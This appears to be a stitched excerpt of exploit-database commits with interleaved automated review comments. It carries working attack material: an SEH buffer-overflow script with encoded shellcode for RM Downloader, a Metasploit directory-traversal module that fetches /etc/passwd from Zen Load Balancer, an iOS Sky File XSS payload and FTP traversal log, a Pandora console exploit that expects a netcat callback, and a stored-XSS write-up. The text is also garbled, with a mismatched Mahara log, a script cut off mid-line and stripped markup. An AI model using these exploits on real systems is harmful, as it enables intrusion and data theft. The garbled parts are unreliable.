+ + +--- PoC Session Logs [POST] --- (Mygroup Ficheros) +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------98107146915324237501974151621 +Content-Length: 4879 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& +files_filebrowser_edit_title=>" >"&files_filebrowser_edit_description=>" +>"&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& +files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& +files_filebrowser_edit_licensor=>" >"&files_filebrowser_edit_licensorurl=>" +>"&files_filebrowser_edit_allowcomments=on& +files_filebrowser_update[7191]=Guardar +cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 +- +POST: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: 
no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2- +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +- +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------126319663526561351602937008964 +Content-Length: 3721 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& +files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& +sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 +- +GET: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: 
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2 + + +Reference(s): +https://mahara_cms.localhost:8080/artefact/ +https://mahara_cms.localhost:8080/artefact/file/ +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48364.py b/exploits/windows/local/48364.py new file mode 100755 index 000000000..9cc992e06 --- /dev/null +++ b/exploits/windows/local/48364.py 
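Review bot: The `--- PoC Session Logs [POST] ---` block and the `Reference(s):` section do not belong to the product in the title: they point at `https://mahara_cms.localhost:8080/artefact/file/groupfiles.php`, use `files_filebrowser_*` form fields and a `mahara=` session cookie, whereas the advisory is about Fork CMS v5.8.0 and its `Displayname` / `var` parameter. Either these logs were pasted from a different advisory or the Fork CMS capture was lost when the document was assembled; as committed, the file's only product-specific evidence is the `PoC: Vulnerable Source` excerpt, which itself appears to have had its markup stripped (only `>"` fragments remain), so a reader cannot reproduce the finding from this text. The request/response exchange for the registration form described in the manual steps is what the section should hold, and the two paths given for that form (`/profiles/register` in the technical description, `/modules/profiles/register` in the manual steps) should be reconciled. `steüs`, `exisiting` and `newst` are typos in the same hunk.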
@@ -0,0 +1,69 @@ +# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) +# Date: 2020-04-20 +# Author: Felipe Winsnes +# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe +# Version: 3.1.3.2.2010.06.13 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "poc.txt" +# 2.- Copy the content of the new file 'poc.txt' to clipboard +# 3.- Open 'RmDownloader.exe' +# 4.- Go to 'Load' tab +# 5.- Paste clipboard in 'Load' parameter +# 6.- Click on button 'OK' +# 7.- Two messageboxes regarding the length of the payload will pop up, click OK +# 8.- Profit + +# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" +buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" +buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" +buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" +buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" +buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" +buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" +buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" +buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" +buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" +buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" +buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" +buf += 
b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" +buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" +buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" +buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" +buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" +buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" +buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" +buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" +buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" +buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" +buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" +buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" +buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" +buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" +buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" +buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" +buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" +buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" +buf += b"\x50\x65\x67\x70\x41\x41" + + +nseh = struct.pack(" Date: Fri, 24 Apr 2020 05:01:50 +0000 Subject: [PATCH 17/18] DB: 2020-04-24 8 changes to exploits/shellcodes User Management System 2.0 - Persistent Cross-Site Scripting User Management System 2.0 - Authentication Bypass Complaint Management System 4.2 - Persistent Cross-Site Scripting Complaint Management System 4.2 - Authentication Bypass Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit) Sky File 2.1.0 iOS - Directory Traversal --- exploits/cgi/webapps/48373.rb | 83 +++++++++ exploits/ios/webapps/48375.txt | 322 +++++++++++++++++++++++++++++++++ exploits/php/webapps/47898.py | 31 ++-- exploits/php/webapps/48368.txt | 50 +++++ exploits/php/webapps/48369.txt | 49 +++++ exploits/php/webapps/48370.txt 
| 42 +++++ exploits/php/webapps/48371.txt | 40 ++++ exploits/php/webapps/48372.txt | 29 +++ files_exploits.csv | 7 + 9 files changed, 637 insertions(+), 16 deletions(-) create mode 100755 exploits/cgi/webapps/48373.rb create mode 100644 exploits/ios/webapps/48375.txt create mode 100644 exploits/php/webapps/48368.txt create mode 100644 exploits/php/webapps/48369.txt create mode 100644 exploits/php/webapps/48370.txt create mode 100644 exploits/php/webapps/48371.txt create mode 100644 exploits/php/webapps/48372.txt diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb new file mode 100755 index 000000000..5e00bbf82 --- /dev/null +++ b/exploits/cgi/webapps/48373.rb 
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Zen Load Balancer Directory Traversal",
+ 'Description' => %q{
+ This module exploits a authenticated directory traversal
+vulnerability in Zen Load
+ Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
+properly handling 'filelog='
+ parameter which allows a malicious actor to load arbitrary file path.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Basim Alabdullah', # Vulnerability discovery
+ 'Dhiraj Mishra' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['EDB', '48308']
+ ],
+ 'DisclosureDate' => "Apr 10 2020"
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(444),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
+ OptString.new('FILEPATH', [false, 'The name of the file to
+download', '/etc/passwd']),
+ OptString.new('TARGETURI', [true, "The base URI path of the
+ZenConsole install", '/']),
+ OptString.new('HttpUsername', [true, 'The username to use for
+the HTTP server', 'admin']),
+ OptString.new('HttpPassword', [false, 'The password to use for
+the HTTP server', 'admin'])
+ ])
+ end
+
+ def run_host(ip)
+ filename = datastore['FILEPATH']
+ traversal = "../" * datastore['DEPTH']
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'index.cgi'),
+ 'vars_get'=>
+ {
+ 'id' => '2-3',
+ 'filelog' => "#{traversal}#(unknown)",
+ 'nlines' => '100',
+ 'action' => 'See logs'
+ },
+ 'authorization' =>
+basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
+ }, 25)
+
+ unless res && res.code == 200
+ print_error('Nothing was downloaded')
+ return
+ end
+
+ print_good("#{peer} - 
Downloaded #{res.body.length} bytes")
+ path = store_loot(
+ 'zenload.http',
+ 'text/plain',
+ ip,
+ res.body,
+ filename
+ )
+ print_good("File saved in: #{path}")
+ end
+end
\ No newline at end of file
diff --git a/exploits/ios/webapps/48375.txt b/exploits/ios/webapps/48375.txt
new file mode 100644
index 000000000..27dd13c8c
--- /dev/null
+++ b/exploits/ios/webapps/48375.txt
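Review bot: Several string literals in `register_options` are committed broken across physical lines — `'The name of the file to` / `download'`, `"The base URI path of the` / `ZenConsole install"`, and `'The username to use for` / `the HTTP server'` (twice) — so each option description carries an embedded newline and a lost space that is printed verbatim by `show options`; the `%q{}` Description and the `'authorization' =>` / `basic_auth(...)` pair show the same wrapping, which looks like a mail client re-flowing the file at ~72 columns rather than intentional layout. Each should be rejoined on one line, e.g. `OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']),`. The `filename` local at the top of `run_host` is only read by `store_loot`, while the `'filelog'` value is the literal `"#{traversal}#(unknown)"` (`#(` is not an interpolation in Ruby); that token matches this page's own missing-filename placeholder and is probably an extraction artefact, so confirm what the committed file sends before merging. The hunk has no other functional change beyond the wrapped lines.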
@@ -0,0 +1,322 @@ +# Title: Sky File 2.1.0 iOS - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-21 +# Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 +# CVE: N/A + +Document Title: +=============== +Sky File v2.1.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2207 + + +Common Vulnerability Scoring System: +==================================== +7.2 + + +Affected Product(s): +==================== +Jin Chen +Product: Sky File v2.1.0 - (iOS) Mobile Web Application +(https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-21: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +1.1 +Multiple persistent cross site scripting vulnerabilities has been +discovered in the official Sky File v2.1.0 mobile ios web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The cross site vulnerability is located in the 'createFolder' module. +Remote attackers with access to the ui via wifi are able +to inject own malicious persistent script code to compromise the +web-application or user credentials. The request method to +inject is POST and the attack vector is located on the application-side. + +Successful exploitation of the vulnerability results session hijacking, +persistent phishing, persistent external redirects and +application-side manipulation of the web context of the affected and +connected device module. + + +1.2 +A directory traversal web vulnerability has been discovered in the +official Sky File v2.1.0 mobile ios web-application. 
+The web vulnerability allows an attacker to unauthorized change the path +or directory to access sensitive application data. + +The directory / path webvulnerability is located in the local ftp server +configuration and path validation with the insecure +access permissions. Normally the anonymous user account is only able to +move inside the main app folder but not above to the +web-server and root application files. In case of the issue remote +attackers are able to connect with anonymous user account +credentials to the wifi ftp server. After that the attacker can use a +misconfiguration in the ftp server of the app path to +transmit a `/null//` path commands after CWD and CDUP navigation via ftp +client. Thus allows the attacker to finally +unauthorized access the main root application path. + +Successful exploitation of the directory traversal vulnerability results +in unauthorized file system access and information disclosure. + + +Proof of Concept (PoC): +======================= +1.1 +The persistent script code inject vulnerability can be exploited by +remote attackers with wifi network access with low user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. 
+ + +PoC: Payload +%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:10000/create +Mime Type[application/json] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Content-Type[application/x-www-form-urlencoded; charset=UTF-8] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:10000/] + Content-Length[140] + Connection[keep-alive] + POST-Daten: + +path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E] + Response Header: + Cache-Control[no-cache] + Content-Length[2] + Content-Type[application/json] + Connection[Close] + Server[GCDWebUploader] +- +Status: 200[OK] +GET +http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E +Mime Type[application/json] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:10000/] + Connection[keep-alive] + Response Header: + Cache-Control[no-cache] + Content-Length[2] + Content-Type[application/json] + Connection[Close] + Server[GCDWebUploader] +- +Status: 200[OK] +GET http://localhost:10000/evil.source +Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + 
Referer[http://localhost:10000/] + Connection[keep-alive] + Upgrade-Insecure-Requests[1] + Response Header: + Server[GCDWebUploader] + Connection[Close] + + + +1.2 +The directory traversal web vulnerability can be exploited by remote +attackers with wifi network access without user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +Manual steps to reproduce ... +1. Open the ftp preview the visible folders +2. Jump back to the the following path +/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/ +3. Include the payload /(null)// and refresh via list command +4. You are now placed in an empty folder without permission to move +5. Add to /(null)/../ to the path and refresh the client +6. Path traversal successful to access the main app root path (./) that +is normally not accessable +7. Successful reproduce of the path traversal web vulnerability! + + +PoC: Payload +/(null)// to /(null)/../ + + +--- PoC Sessio Logs (FTP) --- +[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files +[21:52:40] [R] 221 Thank you for using the FTP service on localhost. +[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds) +[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001 +[21:52:42] [R] Connected to 192.168.2.116 +[21:52:42] [R] 220 iosFtp server ready. +[21:52:42] [R] USER anonymous +[21:52:42] [R] 331 Password required for (null) +[21:52:42] [R] PASS (hidden) +[21:52:42] [R] 230 User (null) logged in. +[21:52:42] [R] SYST +[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912 +[21:52:42] [R] FEAT +[21:52:42] [R] 211-Features supported +[21:52:42] [R] UTF8 +[21:52:42] [R] 211 End +[21:52:42] [R] OPTS UTF8 ON +[21:52:42] [R] 200 Type set Opts to UTF8. 
+[21:52:42] [R] PWD +[21:52:42] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" +is the current directory. +[21:52:42] [R] CWD /(null)/ +[21:52:42] [R] 550 CWD failed. +[21:52:42] [R] PWD +[21:52:42] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" +is the current directory. +[21:52:42] [R] PASV +[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252) +[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236 +[21:52:42] [R] LIST -al +[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:52:42] [R] 226 Transfer complete. +[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s) +[21:52:43] [R] CDUP +[21:52:43] [R] 250 CDUP command successful. +[21:52:43] [R] PWD +[21:52:43] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder" +is the current directory. +[21:52:43] [R] PASV +[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51) +[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323 +[21:52:43] [R] LIST -al +[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:52:43] [R] 226 Transfer complete. +[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s) +[21:52:43] [R] CDUP +[21:52:44] [R] 250 CDUP command successful. +[21:52:44] [R] PWD +[21:52:44] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents" +is the current directory. +[21:52:44] [R] PASV +[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51) +[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707 +[21:52:44] [R] LIST -al +[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:52:44] [R] 226 Transfer complete. 
+[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s) +[21:53:34] [R] CDUP +[21:53:34] [R] 250 CDUP command successful. +[21:53:34] [R] PWD +[21:53:34] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45" +is the current directory. +[21:53:34] [R] PASV +[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14) +[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126 +[21:53:34] [R] LIST -al +[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:34] [R] 226 Transfer complete. +[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s) +[21:53:35] [R] CDUP +[21:53:35] [R] 250 CDUP command successful. +[21:53:35] [R] PWD +[21:53:35] [R] 257 "(null)" is the current directory. +[21:53:35] [R] PASV +[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14) +[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718 +[21:53:35] [R] LIST -al +[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:35] [R] 226 Transfer complete. +[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s) +[21:53:35] [R] PASV +[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14) +[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622 +[21:53:35] [R] LIST -al +[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:35] [R] 226 Transfer complete. +[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s) +[21:53:36] [R] CDUP +[21:53:36] [R] 550 CDUP command failed. +[21:53:41] [R] CWD /etc +[21:53:41] [R] 250 CWD command successful. +[21:53:41] [R] PWD +[21:53:41] [R] 257 "(null)" is the current directory. +[21:53:48] [R] CDUP +[21:53:48] [R] 550 CDUP command failed. +[21:53:51] [R] CWD / +[21:53:51] [R] 250 CWD command successful. +[21:53:51] [R] PWD +[21:53:51] [R] 257 "/" is the current directory. 
+[21:53:51] [R] PASV +[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173) +[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749 +[21:53:51] [R] LIST -al +[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:51] [R] 226 Transfer complete. +[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s) +[21:54:02] [R] TYPE I +[21:54:02] [R] 200 Type set to I. + +Listing Path ./root +- Applications +- bin +- cores +- developer +- Library +- private +- sbin +- System +- usr +- etc +- var +- tmp + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py index 4cd329aa0..46246b5c1 100755 --- a/exploits/php/webapps/47898.py +++ b/exploits/php/webapps/47898.py @@ -12,32 +12,32 @@ import requests import sys -if len(sys.argv) !=3D 6: +if len(sys.argv) != 6: print("[+] Usage : ./exploit.py target username password ip port") exit() -target =3D sys.argv[1] -username =3D sys.argv[2] -password =3D sys.argv[3] -ip =3D sys.argv[4] -port =3D int(sys.argv[5]) +target = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = int(sys.argv[5]) -request =3D requests.session() +request = requests.session() -login_info =3D { +login_info = { "nick": username, "pass": password, "login_button": "Login" } -login_request =3D request.post( - target+"/pandora_console/index.php?login=3D1", +login_request = request.post( + target+"/pandora_console/index.php?login=1", login_info, - verify=3DFalse, - allow_redirects=3DTrue + verify=False, + allow_redirects=True ) -resp =3D login_request.text +resp = login_request.text if "User not found in database" in resp: print("[-] Login Failed") 
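Review bot: The `# Title:` header announces only a directory traversal, but the body documents two distinct issues — 1.1, a persistent cross-site scripting in the `createFolder` module (the `POST http://localhost:10000/create` with the `path` parameter), and 1.2, the FTP path traversal — and the single CVSS value of 7.2 is not attributed to either; the header should list both findings or the CVSS section should say which one it scores. The FTP transcript also does not line up with `Manual steps to reproduce`: `CWD /(null)/` is answered with `550 CWD failed.`, and the session reaches the `"(null)"` working directory only through repeated `CDUP` from the container root, so the `/(null)//` → `/(null)/../` payload of steps 3–5 is never shown succeeding in the log — presumably a different session was captured than the one the steps describe. `--- PoC Sessio Logs (FTP) ---` is a typo for `Session`, and `accessable` for `accessible`.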
@@ -47,7 +47,7 @@ else: print("[+] Sending crafted graph request ..") -body_request =3D { +body_request = { "date": "0", "time": "0", "period": "0", @@ -65,7 +65,6 @@ body_request =3D { "draw_button": "Draw" } -draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati= -on/netflow/nf_live_view&pure=3D0" +draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0" print("[+] Check your netcat ;)") request.post(draw_url, body_request) \ No newline at end of file diff --git a/exploits/php/webapps/48368.txt b/exploits/php/webapps/48368.txt new file mode 100644 index 000000000..457a98a70 --- /dev/null +++ b/exploits/php/webapps/48368.txt @@ -0,0 +1,50 @@ +# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: v2.0 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------ Details: + +1- Vulnerable code is here: + +Insert user registration information to the DB without filtering. + +if(isset($_POST['signup'])) +{ +$fname=$_POST['fname']; +$lname=$_POST['lname']; +$email=$_POST['email']; +$password=$_POST['password']; +$contact=$_POST['contact']; +$enc_password=$password; +$msg=mysqli_query($con,"insert into +users(fname,lname,email,password,contactno) +values('$fname','$lname','$email','$enc_password','$contact')"); +if($msg) +{ +echo ""; +} +} + +2- In the admin dashboard: + +Get fullName from DB and print it without any filtering + + + + + + + + + + +4- If we insert value of the "fname" as "script>prompt(1)", we can +perform this attack as "Stored XSS" \ No newline at end of file diff --git a/exploits/php/webapps/48369.txt b/exploits/php/webapps/48369.txt new file mode 100644 index 000000000..5fe1b5d54 --- /dev/null +++ b/exploits/php/webapps/48369.txt 
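Review bot: The quoted-printable clean-up in the `@@ -65,7 +65,6 @@` hunk is incomplete: the two wrapped lines were joined, but `operati=on/netflow/nf_live_view` still carries the `=` of the quoted-printable soft line break (`=` followed by a newline, which decodes to nothing), so the joined path should read `operation/netflow/nf_live_view` — `draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0"`. The `=3D` → `=` replacements in the `@@ -12,32 +12,32 @@` and `@@ -47,7 +47,7 @@` hunks look complete, and the `=3D1` in the `login=` query string was handled correctly. The enclosing script continues outside these hunks.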
